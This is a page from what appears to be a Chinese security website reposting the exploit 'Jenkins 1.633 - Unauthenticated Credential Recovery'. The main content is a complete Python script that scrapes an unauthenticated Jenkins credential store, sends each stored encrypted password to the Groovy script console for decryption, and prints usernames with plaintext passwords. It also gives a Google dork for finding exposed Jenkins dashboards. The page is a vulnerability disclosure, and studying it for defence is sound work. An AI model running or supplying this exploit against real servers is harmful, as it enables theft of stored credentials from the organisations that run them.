首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Jenkins 1.633 - Unauthenticated Credential Recovery 来源：http://www.th3r3p0.com 作者：TheRepo 发布时间：2015-11-11   # Exploit Title: Jenkins Unauthenticated Credential Recovery # Disclosure Date: 10/14/2015 # Response Date: 10/14/2015 # Response: "Recommend this be rejected as a vulnerability." # Full report including response: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html # Vendor Homepage: https://jenkins-ci.org/ # Tested on: Jenkins v1.633 # Author = 'Th3R3p0' | Justin Massey # Google Dork: intitle:"Dashboard [Jenkins]" Credentials   import requests import re from BeautifulSoup import BeautifulSoup import urllib     # Usage: Modify the URL below to match the target host and port #   Must have trailing slash at end of URL url='http://192.168.1.151:8080/'   # makes request to gather all users with stored credentials r= requests.get(url + 'credential-store/domain/_/') soup = BeautifulSoup(r.text)   # loop to go through all hrefs and match the regex "credential" and add the urls to the users list users = [] for link in soup.body.findAll('a', href=True):     m = re.match("credential", link['href'])     if m:         if link['href'] not in users:             users.append(link['href'])   for users in users:     r2 = requests.get(url + 'credential-store/domain/_/'+users+'/update')     soup2 = BeautifulSoup(r2.text)       # Finds the user and password value in html and stores in encPass variable     user = soup2.body.findAll(attrs={"name" : "_.username"})[0]['value']     encPass = soup2.body.findAll(attrs={"name" : "_.password"})[0]['value']     # Encodes the password to www-form-urlencoded standards needed for the expected content type     encPassEncoded = urllib.quote(encPass, safe='')       # Script to run in groovy scripting engine to decrypt the password     script = 'script=hudson.util.Secret.decrypt+%%27' \              '%s'\              '%%27&json=%%7B%%22script%%22%%3A+%%22hudson.util.Secret.decrypt+%%27' \              '%s' \              '%%27%%22%%2C+%%22%%22%%3A+%%22%%22%%7D&Submit=Run' % (encPassEncoded, encPassEncoded)       # Using sessions because the POST requires a session token to be present     with requests.Session() as s:         r3 = s.get(url+'script')         headers = {'content-type': 'application/x-www-form-urlencoded'}         r3 = s.post(url+'script',data=script, headers=headers)     soup3 = BeautifulSoup(r3.text)       # Extracts password from body     password = soup3.body.findAll('pre')[1].text     password = re.sub('Result:', '', password)     print "User: %s | Password:%s" % (user, password)   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Huawei HG630a and HG630a-50 - ·IBM Installation Manager 1.8.1 ·POP Peeper 4.0.1 - SEH Over-Wr ·FBZX 2.10 - Local Stack-Based ·WordPress Ajax Load More PHP U ·TACK 1.07 - Local Stack-Based ·QNap QVR Client 5.1.0.11290 - ·TUDU 0.82 - Local Stack-Based ·China Chopper Caidao PHP Backd ·Sam Spade 1.14 - S-Lang Comman ·Symantec pcAnywhere 12.5.0 Win ·vBulletin 5.1.2 Unserialize Co   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved